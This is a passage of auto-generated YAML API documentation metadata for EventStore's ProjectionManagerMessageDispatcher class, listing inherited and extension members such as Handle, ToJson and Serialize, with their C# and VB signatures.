EventStore.Core.Bus.IHandle`1 name: IHandle nameWithType: IHandle fullName: EventStore.Core.Bus.IHandle - name: '(Of ' nameWithType: '(Of ' fullName: '(Of ' - uid: EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase name: PartitionProcessingResultOutputBase nameWithType: PartitionProcessingResultOutputBase fullName: EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase - name: ) nameWithType: ) fullName: ) - uid: System.Object.Equals(System.Object) commentId: M:System.Object.Equals(System.Object) parent: System.Object isExternal: true name: Equals(Object) nameWithType: Object.Equals(Object) fullName: System.Object.Equals(System.Object) spec.csharp: - uid: System.Object.Equals(System.Object) name: Equals nameWithType: Object.Equals fullName: System.Object.Equals isExternal: true - name: ( nameWithType: ( fullName: ( - uid: System.Object name: Object nameWithType: Object fullName: System.Object isExternal: true - name: ) nameWithType: ) fullName: ) spec.vb: - uid: System.Object.Equals(System.Object) name: Equals nameWithType: Object.Equals fullName: System.Object.Equals isExternal: true - name: ( nameWithType: ( fullName: ( - uid: System.Object name: Object nameWithType: Object fullName: System.Object isExternal: true - name: ) nameWithType: ) fullName: ) - uid: System.Object.Equals(System.Object,System.Object) commentId: M:System.Object.Equals(System.Object,System.Object) parent: System.Object isExternal: true name: Equals(Object, Object) nameWithType: Object.Equals(Object, Object) fullName: System.Object.Equals(System.Object, System.Object) spec.csharp: - uid: System.Object.Equals(System.Object,System.Object) name: Equals nameWithType: Object.Equals fullName: System.Object.Equals isExternal: true - name: ( nameWithType: ( fullName: ( - uid: System.Object name: Object nameWithType: Object fullName: System.Object isExternal: true - name: ', ' nameWithType: ', ' fullName: ', ' - uid: System.Object name: Object nameWithType: Object fullName: System.Object isExternal: true - name: ) nameWithType: ) fullName: ) spec.vb: - uid: System.Object.Equals(System.Object,System.Object) name: Equals nameWithType: Object.Equals fullName: System.Object.Equals isExternal: true - name: ( nameWithType: ( fullName: ( - uid: System.Object name: Object nameWithType: Object fullName: System.Object isExternal: true - name: ', ' nameWithType: ', ' fullName: ', ' - uid: System.Object name: Object nameWithType: Object fullName: System.Object isExternal: true - name: ) nameWithType: ) fullName: ) - uid: System.Object.GetHashCode commentId: M:System.Object.GetHashCode parent: System.Object isExternal: true name: GetHashCode() nameWithType: Object.GetHashCode() fullName: System.Object.GetHashCode() spec.csharp: - uid: System.Object.GetHashCode name: GetHashCode nameWithType: Object.GetHashCode fullName: System.Object.GetHashCode isExternal: true - name: ( nameWithType: ( fullName: ( - name: ) nameWithType: ) fullName: ) spec.vb: - uid: System.Object.GetHashCode name: GetHashCode nameWithType: Object.GetHashCode fullName: System.Object.GetHashCode isExternal: true - name: ( nameWithType: ( fullName: ( - name: ) nameWithType: ) fullName: ) - uid: System.Object.GetType commentId: M:System.Object.GetType parent: System.Object isExternal: true name: GetType() nameWithType: Object.GetType() fullName: System.Object.GetType() spec.csharp: - uid: System.Object.GetType name: GetType nameWithType: Object.GetType fullName: System.Object.GetType isExternal: true - name: ( nameWithType: ( fullName: ( - name: ) nameWithType: ) fullName: ) spec.vb: - uid: System.Object.GetType name: GetType nameWithType: Object.GetType fullName: System.Object.GetType isExternal: true - name: ( nameWithType: ( fullName: ( - name: ) nameWithType: ) fullName: ) - uid: System.Object.MemberwiseClone commentId: M:System.Object.MemberwiseClone parent: System.Object isExternal: true name: MemberwiseClone() nameWithType: Object.MemberwiseClone() fullName: System.Object.MemberwiseClone() spec.csharp: - uid: System.Object.MemberwiseClone name: MemberwiseClone nameWithType: Object.MemberwiseClone fullName: System.Object.MemberwiseClone isExternal: true - name: ( nameWithType: ( fullName: ( - name: ) nameWithType: ) fullName: ) spec.vb: - uid: System.Object.MemberwiseClone name: MemberwiseClone nameWithType: Object.MemberwiseClone fullName: System.Object.MemberwiseClone isExternal: true - name: ( nameWithType: ( fullName: ( - name: ) nameWithType: ) fullName: ) - uid: System.Object.ReferenceEquals(System.Object,System.Object) commentId: M:System.Object.ReferenceEquals(System.Object,System.Object) parent: System.Object isExternal: true name: ReferenceEquals(Object, Object) nameWithType: Object.ReferenceEquals(Object, Object) fullName: System.Object.ReferenceEquals(System.Object, System.Object) spec.csharp: - uid: System.Object.ReferenceEquals(System.Object,System.Object) name: ReferenceEquals nameWithType: Object.ReferenceEquals fullName: System.Object.ReferenceEquals isExternal: true - name: ( nameWithType: ( fullName: ( - uid: System.Object name: Object nameWithType: Object fullName: System.Object isExternal: true - name: ', ' nameWithType: ', ' fullName: ', ' - uid: System.Object name: Object nameWithType: Object fullName: System.Object isExternal: true - name: ) nameWithType: ) fullName: ) spec.vb: - uid: System.Object.ReferenceEquals(System.Object,System.Object) name: ReferenceEquals nameWithType: Object.ReferenceEquals fullName: System.Object.ReferenceEquals isExternal: true - name: ( nameWithType: ( fullName: ( - uid: System.Object name: Object nameWithType: Object fullName: System.Object isExternal: true - name: ', ' nameWithType: ', ' fullName: ', ' - uid: System.Object name: Object nameWithType: Object fullName: System.Object isExternal: true - name: ) nameWithType: ) fullName: ) - uid: System.Object.ToString commentId: M:System.Object.ToString parent: System.Object isExternal: true name: ToString() nameWithType: Object.ToString() fullName: System.Object.ToString() spec.csharp: - uid: System.Object.ToString name: ToString nameWithType: Object.ToString fullName: System.Object.ToString isExternal: true - name: ( nameWithType: ( fullName: ( - name: ) nameWithType: ) fullName: ) spec.vb: - uid: System.Object.ToString name: ToString nameWithType: Object.ToString fullName: System.Object.ToString isExternal: true - name: ( nameWithType: ( fullName: ( - name: ) nameWithType: ) fullName: ) - uid: System.Object.EventStore.Common.Utils.Json.ToJsonBytes commentId: M:EventStore.Common.Utils.Json.ToJsonBytes(System.Object) parent: EventStore.Common.Utils.Json definition: EventStore.Common.Utils.Json.ToJsonBytes(System.Object) name: ToJsonBytes() nameWithType: Json.ToJsonBytes() fullName: EventStore.Common.Utils.Json.ToJsonBytes() spec.csharp: - uid: EventStore.Common.Utils.Json.ToJsonBytes name: ToJsonBytes nameWithType: Json.ToJsonBytes fullName: EventStore.Common.Utils.Json.ToJsonBytes - name: ( nameWithType: ( fullName: ( - name: ) nameWithType: ) fullName: ) spec.vb: - uid: EventStore.Common.Utils.Json.ToJsonBytes name: ToJsonBytes nameWithType: Json.ToJsonBytes fullName: EventStore.Common.Utils.Json.ToJsonBytes - name: ( nameWithType: ( fullName: ( - name: ) nameWithType: ) fullName: ) - uid: System.Object.EventStore.Common.Utils.Json.ToJson commentId: M:EventStore.Common.Utils.Json.ToJson(System.Object) parent: EventStore.Common.Utils.Json definition: EventStore.Common.Utils.Json.ToJson(System.Object) name: ToJson() nameWithType: Json.ToJson() fullName: EventStore.Common.Utils.Json.ToJson() spec.csharp: - uid: EventStore.Common.Utils.Json.ToJson name: ToJson nameWithType: Json.ToJson fullName: EventStore.Common.Utils.Json.ToJson - name: ( nameWithType: ( fullName: ( - name: ) nameWithType: ) fullName: ) spec.vb: - uid: EventStore.Common.Utils.Json.ToJson name: ToJson nameWithType: Json.ToJson fullName: EventStore.Common.Utils.Json.ToJson - name: ( nameWithType: ( fullName: ( - name: ) nameWithType: ) fullName: ) - uid: System.Object.EventStore.Common.Utils.Json.ToCanonicalJson commentId: M:EventStore.Common.Utils.Json.ToCanonicalJson(System.Object) parent: EventStore.Common.Utils.Json definition: EventStore.Common.Utils.Json.ToCanonicalJson(System.Object) name: ToCanonicalJson() nameWithType: Json.ToCanonicalJson() fullName: EventStore.Common.Utils.Json.ToCanonicalJson() spec.csharp: - uid: EventStore.Common.Utils.Json.ToCanonicalJson name: ToCanonicalJson nameWithType: Json.ToCanonicalJson fullName: EventStore.Common.Utils.Json.ToCanonicalJson - name: ( nameWithType: ( fullName: ( - name: ) nameWithType: ) fullName: ) spec.vb: - uid: EventStore.Common.Utils.Json.ToCanonicalJson name: ToCanonicalJson nameWithType: Json.ToCanonicalJson fullName: EventStore.Common.Utils.Json.ToCanonicalJson - name: ( nameWithType: ( fullName: ( - name: ) nameWithType: ) fullName: ) - uid: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.Serialize``1 commentId: M:EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.Serialize``1(``0) parent: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions definition: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.Serialize``1(``0) name: Serialize<ProjectionManagerMessageDispatcher>() nameWithType: ProtobufExtensions.Serialize<ProjectionManagerMessageDispatcher>() fullName: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.Serialize<EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher>() nameWithType.vb: ProtobufExtensions.Serialize(Of ProjectionManagerMessageDispatcher)() fullName.vb: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.Serialize(Of EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher)() name.vb: Serialize(Of ProjectionManagerMessageDispatcher)() spec.csharp: - uid: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.Serialize``1 name: Serialize<ProjectionManagerMessageDispatcher> nameWithType: ProtobufExtensions.Serialize<ProjectionManagerMessageDispatcher> fullName: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.Serialize<EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher> - name: ( nameWithType: ( fullName: ( - name: ) nameWithType: ) fullName: ) spec.vb: - uid: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.Serialize``1 name: Serialize(Of ProjectionManagerMessageDispatcher) nameWithType: ProtobufExtensions.Serialize(Of ProjectionManagerMessageDispatcher) fullName: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.Serialize(Of EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher) - name: ( nameWithType: ( fullName: ( - name: ) nameWithType: ) fullName: ) - uid: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.SerializeToArray``1 commentId: M:EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.SerializeToArray``1(``0) parent: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions definition: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.SerializeToArray``1(``0) name: SerializeToArray<ProjectionManagerMessageDispatcher>() nameWithType: ProtobufExtensions.SerializeToArray<ProjectionManagerMessageDispatcher>() fullName: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.SerializeToArray<EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher>() nameWithType.vb: ProtobufExtensions.SerializeToArray(Of ProjectionManagerMessageDispatcher)() fullName.vb: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.SerializeToArray(Of EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher)() name.vb: SerializeToArray(Of ProjectionManagerMessageDispatcher)() spec.csharp: - uid: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.SerializeToArray``1 name: SerializeToArray<ProjectionManagerMessageDispatcher> nameWithType: ProtobufExtensions.SerializeToArray<ProjectionManagerMessageDispatcher> fullName: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.SerializeToArray<EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher> - name: ( nameWithType: ( fullName: ( - name: ) nameWithType: ) fullName: ) spec.vb: - uid: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.SerializeToArray``1 name: SerializeToArray(Of ProjectionManagerMessageDispatcher) nameWithType: ProtobufExtensions.SerializeToArray(Of ProjectionManagerMessageDispatcher) fullName: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.SerializeToArray(Of EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher) - name: ( nameWithType: ( fullName: ( - name: ) nameWithType: ) fullName: ) - uid: System commentId: N:System isExternal: true name: System nameWithType: System fullName: System - uid: EventStore.Core.Bus.IHandle`1 commentId: T:EventStore.Core.Bus.IHandle`1 name: IHandle<T> nameWithType: IHandle<T> fullName: EventStore.Core.Bus.IHandle<T> nameWithType.vb: IHandle(Of T) fullName.vb: EventStore.Core.Bus.IHandle(Of T) name.vb: IHandle(Of T) spec.csharp: - uid: EventStore.Core.Bus.IHandle`1 name: IHandle nameWithType: IHandle fullName: EventStore.Core.Bus.IHandle - name: < nameWithType: < fullName: < - name: T nameWithType: T fullName: T - name: '>' nameWithType: '>' fullName: '>' spec.vb: - uid: EventStore.Core.Bus.IHandle`1 name: IHandle nameWithType: IHandle fullName: EventStore.Core.Bus.IHandle - name: '(Of ' nameWithType: '(Of ' fullName: '(Of ' - name: T nameWithType: T fullName: T - name: ) nameWithType: ) fullName: ) - uid: EventStore.Core.Bus commentId: N:EventStore.Core.Bus name: EventStore.Core.Bus nameWithType: EventStore.Core.Bus fullName: EventStore.Core.Bus - uid: EventStore.Common.Utils.Json.ToJsonBytes(System.Object) commentId: M:EventStore.Common.Utils.Json.ToJsonBytes(System.Object) isExternal: true name: ToJsonBytes(Object) nameWithType: Json.ToJsonBytes(Object) fullName: EventStore.Common.Utils.Json.ToJsonBytes(System.Object) spec.csharp: - uid: EventStore.Common.Utils.Json.ToJsonBytes(System.Object) name: ToJsonBytes nameWithType: Json.ToJsonBytes fullName: EventStore.Common.Utils.Json.ToJsonBytes - name: ( nameWithType: ( fullName: ( - uid: System.Object name: Object nameWithType: Object fullName: System.Object isExternal: true - name: ) nameWithType: ) fullName: ) spec.vb: - uid: EventStore.Common.Utils.Json.ToJsonBytes(System.Object) name: ToJsonBytes nameWithType: Json.ToJsonBytes fullName: EventStore.Common.Utils.Json.ToJsonBytes - name: ( nameWithType: ( fullName: ( - uid: System.Object name: Object nameWithType: Object fullName: System.Object isExternal: true - name: ) nameWithType: ) fullName: ) - uid: EventStore.Common.Utils.Json commentId: T:EventStore.Common.Utils.Json parent: EventStore.Common.Utils name: Json nameWithType: Json fullName: EventStore.Common.Utils.Json - uid: EventStore.Common.Utils.Json.ToJson(System.Object) commentId: M:EventStore.Common.Utils.Json.ToJson(System.Object) isExternal: true name: ToJson(Object) nameWithType: Json.ToJson(Object) fullName: EventStore.Common.Utils.Json.ToJson(System.Object) spec.csharp: - uid: EventStore.Common.Utils.Json.ToJson(System.Object) name: ToJson nameWithType: Json.ToJson fullName: EventStore.Common.Utils.Json.ToJson - name: ( nameWithType: ( fullName: ( - uid: System.Object name: Object nameWithType: Object fullName: System.Object isExternal: true - name: ) nameWithType: ) fullName: ) spec.vb: - uid: EventStore.Common.Utils.Json.ToJson(System.Object) name: ToJson nameWithType: Json.ToJson fullName: EventStore.Common.Utils.Json.ToJson - name: ( nameWithType: ( fullName: ( - uid: System.Object name: Object nameWithType: Object fullName: System.Object isExternal: true - name: ) nameWithType: ) fullName: ) - uid: EventStore.Common.Utils.Json.ToCanonicalJson(System.Object) commentId: M:EventStore.Common.Utils.Json.ToCanonicalJson(System.Object) isExternal: true name: ToCanonicalJson(Object) nameWithType: Json.ToCanonicalJson(Object) fullName: EventStore.Common.Utils.Json.ToCanonicalJson(System.Object) spec.csharp: - uid: EventStore.Common.Utils.Json.ToCanonicalJson(System.Object) name: ToCanonicalJson nameWithType: Json.ToCanonicalJson fullName: EventStore.Common.Utils.Json.ToCanonicalJson - name: ( nameWithType: ( fullName: ( - uid: System.Object name: Object nameWithType: Object fullName: System.Object isExternal: true - name: ) nameWithType: ) fullName: ) spec.vb: - uid: EventStore.Common.Utils.Json.ToCanonicalJson(System.Object) name: ToCanonicalJson nameWithType: Json.ToCanonicalJson fullName: EventStore.Common.Utils.Json.ToCanonicalJson - name: ( nameWithType: ( fullName: ( - uid: System.Object name: Object nameWithType: Object fullName: System.Object isExternal: true - name: ) nameWithType: ) fullName: ) - uid: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.Serialize``1(``0) commentId: M:EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.Serialize``1(``0) name: Serialize<T>(T) nameWithType: ProtobufExtensions.Serialize<T>(T) fullName: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.Serialize<T>(T) nameWithType.vb: ProtobufExtensions.Serialize(Of T)(T) fullName.vb: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.Serialize(Of T)(T) name.vb: Serialize(Of T)(T) spec.csharp: - uid: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.Serialize``1(``0) name: Serialize<T> nameWithType: ProtobufExtensions.Serialize<T> fullName: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.Serialize<T> - name: ( nameWithType: ( fullName: ( - name: T nameWithType: T fullName: T - name: ) nameWithType: ) fullName: ) spec.vb: - uid: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.Serialize``1(``0) name: Serialize(Of T) nameWithType: ProtobufExtensions.Serialize(Of T) fullName: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.Serialize(Of T) - name: ( nameWithType: ( fullName: ( - name: T nameWithType: T fullName: T - name: ) nameWithType: ) fullName: ) - uid: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions commentId: T:EventStore.Core.Services.Transport.Tcp.ProtobufExtensions parent: EventStore.Core.Services.Transport.Tcp name: ProtobufExtensions nameWithType: ProtobufExtensions fullName: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions - uid: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.SerializeToArray``1(``0) commentId: M:EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.SerializeToArray``1(``0) name: SerializeToArray<T>(T) nameWithType: ProtobufExtensions.SerializeToArray<T>(T) fullName: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.SerializeToArray<T>(T) nameWithType.vb: ProtobufExtensions.SerializeToArray(Of T)(T) fullName.vb: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.SerializeToArray(Of T)(T) name.vb: SerializeToArray(Of T)(T) spec.csharp: - uid: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.SerializeToArray``1(``0) name: SerializeToArray<T> nameWithType: ProtobufExtensions.SerializeToArray<T> fullName: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.SerializeToArray<T> - name: ( nameWithType: ( fullName: ( - name: T nameWithType: T fullName: T - name: ) nameWithType: ) fullName: ) spec.vb: - uid: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.SerializeToArray``1(``0) name: SerializeToArray(Of T) nameWithType: ProtobufExtensions.SerializeToArray(Of T) fullName: EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.SerializeToArray(Of T) - name: ( nameWithType: ( fullName: ( - name: T nameWithType: T fullName: T - name: ) nameWithType: ) fullName: ) - uid: EventStore.Common.Utils commentId: N:EventStore.Common.Utils name: EventStore.Common.Utils nameWithType: EventStore.Common.Utils fullName: EventStore.Common.Utils - uid: EventStore.Core.Services.Transport.Tcp commentId: N:EventStore.Core.Services.Transport.Tcp name: EventStore.Core.Services.Transport.Tcp nameWithType: EventStore.Core.Services.Transport.Tcp fullName: EventStore.Core.Services.Transport.Tcp - uid: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.#ctor* commentId: Overload:EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.#ctor name: ProjectionManagerMessageDispatcher nameWithType: ProjectionManagerMessageDispatcher.ProjectionManagerMessageDispatcher fullName: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.ProjectionManagerMessageDispatcher - uid: System.Collections.Generic.IDictionary{System.Guid,EventStore.Core.Bus.IPublisher} commentId: T:System.Collections.Generic.IDictionary{System.Guid,EventStore.Core.Bus.IPublisher} parent: System.Collections.Generic definition: System.Collections.Generic.IDictionary`2 name: IDictionary<Guid, IPublisher> nameWithType: IDictionary<Guid, IPublisher> fullName: System.Collections.Generic.IDictionary<System.Guid, EventStore.Core.Bus.IPublisher> nameWithType.vb: IDictionary(Of Guid, IPublisher) fullName.vb: System.Collections.Generic.IDictionary(Of System.Guid, EventStore.Core.Bus.IPublisher) name.vb: IDictionary(Of Guid, IPublisher) spec.csharp: - uid: System.Collections.Generic.IDictionary`2 name: IDictionary nameWithType: IDictionary fullName: System.Collections.Generic.IDictionary isExternal: true - name: < nameWithType: < fullName: < - uid: System.Guid name: Guid nameWithType: Guid fullName: System.Guid isExternal: true - name: ', ' nameWithType: ', ' fullName: ', ' - uid: EventStore.Core.Bus.IPublisher name: IPublisher nameWithType: IPublisher fullName: EventStore.Core.Bus.IPublisher - name: '>' nameWithType: '>' fullName: '>' spec.vb: - uid: System.Collections.Generic.IDictionary`2 name: IDictionary nameWithType: IDictionary fullName: System.Collections.Generic.IDictionary isExternal: true - name: '(Of ' nameWithType: '(Of ' fullName: '(Of ' - uid: System.Guid name: Guid nameWithType: Guid fullName: System.Guid isExternal: true - name: ', ' nameWithType: ', ' fullName: ', ' - uid: EventStore.Core.Bus.IPublisher name: IPublisher nameWithType: IPublisher fullName: EventStore.Core.Bus.IPublisher - name: ) nameWithType: ) fullName: ) - uid: System.Collections.Generic.IDictionary`2 commentId: T:System.Collections.Generic.IDictionary`2 isExternal: true name: IDictionary<TKey, TValue> nameWithType: IDictionary<TKey, TValue> fullName: System.Collections.Generic.IDictionary<TKey, TValue> nameWithType.vb: IDictionary(Of TKey, TValue) fullName.vb: System.Collections.Generic.IDictionary(Of TKey, TValue) name.vb: IDictionary(Of TKey, TValue) spec.csharp: - uid: System.Collections.Generic.IDictionary`2 name: IDictionary nameWithType: IDictionary fullName: System.Collections.Generic.IDictionary isExternal: true - name: < nameWithType: < fullName: < - name: TKey nameWithType: TKey fullName: TKey - name: ', ' nameWithType: ', ' fullName: ', ' - name: TValue nameWithType: TValue fullName: TValue - name: '>' nameWithType: '>' fullName: '>' spec.vb: - uid: System.Collections.Generic.IDictionary`2 name: IDictionary nameWithType: IDictionary fullName: System.Collections.Generic.IDictionary isExternal: true - name: '(Of ' nameWithType: '(Of ' fullName: '(Of ' - name: TKey nameWithType: TKey fullName: TKey - name: ', ' nameWithType: ', ' fullName: ', ' - name: TValue nameWithType: TValue fullName: TValue - name: ) nameWithType: ) fullName: ) - uid: System.Collections.Generic commentId: N:System.Collections.Generic isExternal: true name: System.Collections.Generic nameWithType: System.Collections.Generic fullName: System.Collections.Generic - uid: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.Handle* commentId: Overload:EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.Handle name: Handle nameWithType: ProjectionManagerMessageDispatcher.Handle fullName: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.Handle - uid: EventStore.Core.Bus.IHandle{EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase}.Handle(EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase) commentId: M:EventStore.Core.Bus.IHandle{EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase}.Handle(EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase) parent: EventStore.Core.Bus.IHandle{EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase} definition: EventStore.Core.Bus.IHandle`1.Handle(`0) name: Handle(PartitionProcessingResultBase) nameWithType: IHandle<PartitionProcessingResultBase>.Handle(PartitionProcessingResultBase) fullName: EventStore.Core.Bus.IHandle<EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase>.Handle(EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase) nameWithType.vb: IHandle(Of PartitionProcessingResultBase).Handle(PartitionProcessingResultBase) fullName.vb: EventStore.Core.Bus.IHandle(Of EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase).Handle(EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase) spec.csharp: - uid: EventStore.Core.Bus.IHandle`1.Handle(`0) name: Handle nameWithType: IHandle<PartitionProcessingResultBase>.Handle fullName: EventStore.Core.Bus.IHandle<EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase>.Handle - name: ( nameWithType: ( fullName: ( - uid: EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase name: PartitionProcessingResultBase nameWithType: PartitionProcessingResultBase fullName: EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase - name: ) nameWithType: ) fullName: ) spec.vb: - uid: EventStore.Core.Bus.IHandle`1.Handle(`0) name: Handle nameWithType: IHandle(Of PartitionProcessingResultBase).Handle fullName: EventStore.Core.Bus.IHandle(Of EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase).Handle - name: ( nameWithType: ( fullName: ( - uid: EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase name: PartitionProcessingResultBase nameWithType: PartitionProcessingResultBase fullName: EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase - name: ) nameWithType: ) fullName: ) - uid: EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase commentId: T:EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase parent: EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages name: PartitionProcessingResultBase nameWithType: PartitionProcessingResultBase fullName: EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase - uid: EventStore.Core.Bus.IHandle`1.Handle(`0) commentId: M:EventStore.Core.Bus.IHandle`1.Handle(`0) name: Handle(T) nameWithType: IHandle<T>.Handle(T) fullName: EventStore.Core.Bus.IHandle<T>.Handle(T) nameWithType.vb: IHandle(Of T).Handle(T) fullName.vb: EventStore.Core.Bus.IHandle(Of T).Handle(T) spec.csharp: - uid: EventStore.Core.Bus.IHandle`1.Handle(`0) name: Handle nameWithType: IHandle<T>.Handle fullName: EventStore.Core.Bus.IHandle<T>.Handle - name: ( nameWithType: ( fullName: ( - name: T nameWithType: T fullName: T - name: ) nameWithType: ) fullName: ) spec.vb: - uid: EventStore.Core.Bus.IHandle`1.Handle(`0) name: Handle nameWithType: IHandle(Of T).Handle fullName: EventStore.Core.Bus.IHandle(Of T).Handle - name: ( nameWithType: ( fullName: ( - name: T nameWithType: T fullName: T - name: ) nameWithType: ) fullName: ) - uid: EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages commentId: N:EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages name: EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages nameWithType: EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages fullName: EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages - uid: EventStore.Core.Bus.IHandle{EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading}.Handle(EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading) commentId: M:EventStore.Core.Bus.IHandle{EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading}.Handle(EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading) parent: EventStore.Core.Bus.IHandle{EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading} definition: EventStore.Core.Bus.IHandle`1.Handle(`0) name: Handle(ReaderSubscriptionManagement.SpoolStreamReading) nameWithType: IHandle<ReaderSubscriptionManagement.SpoolStreamReading>.Handle(ReaderSubscriptionManagement.SpoolStreamReading) fullName: EventStore.Core.Bus.IHandle<EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading>.Handle(EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading) nameWithType.vb: IHandle(Of ReaderSubscriptionManagement.SpoolStreamReading).Handle(ReaderSubscriptionManagement.SpoolStreamReading) fullName.vb: EventStore.Core.Bus.IHandle(Of EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading).Handle(EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading) spec.csharp: - uid: EventStore.Core.Bus.IHandle`1.Handle(`0) name: Handle nameWithType: IHandle<ReaderSubscriptionManagement.SpoolStreamReading>.Handle fullName: EventStore.Core.Bus.IHandle<EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading>.Handle - name: ( nameWithType: ( fullName: ( - uid: EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading name: ReaderSubscriptionManagement.SpoolStreamReading nameWithType: ReaderSubscriptionManagement.SpoolStreamReading fullName: EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading - name: ) nameWithType: ) fullName: ) spec.vb: - uid: EventStore.Core.Bus.IHandle`1.Handle(`0) name: Handle nameWithType: IHandle(Of ReaderSubscriptionManagement.SpoolStreamReading).Handle fullName: EventStore.Core.Bus.IHandle(Of EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading).Handle - name: ( nameWithType: ( fullName: ( - uid: EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading name: ReaderSubscriptionManagement.SpoolStreamReading nameWithType: ReaderSubscriptionManagement.SpoolStreamReading fullName: EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading - name: ) nameWithType: ) fullName: ) - uid: EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading commentId: T:EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading parent: EventStore.Projections.Core.Messages name: ReaderSubscriptionManagement.SpoolStreamReading nameWithType: ReaderSubscriptionManagement.SpoolStreamReading fullName: 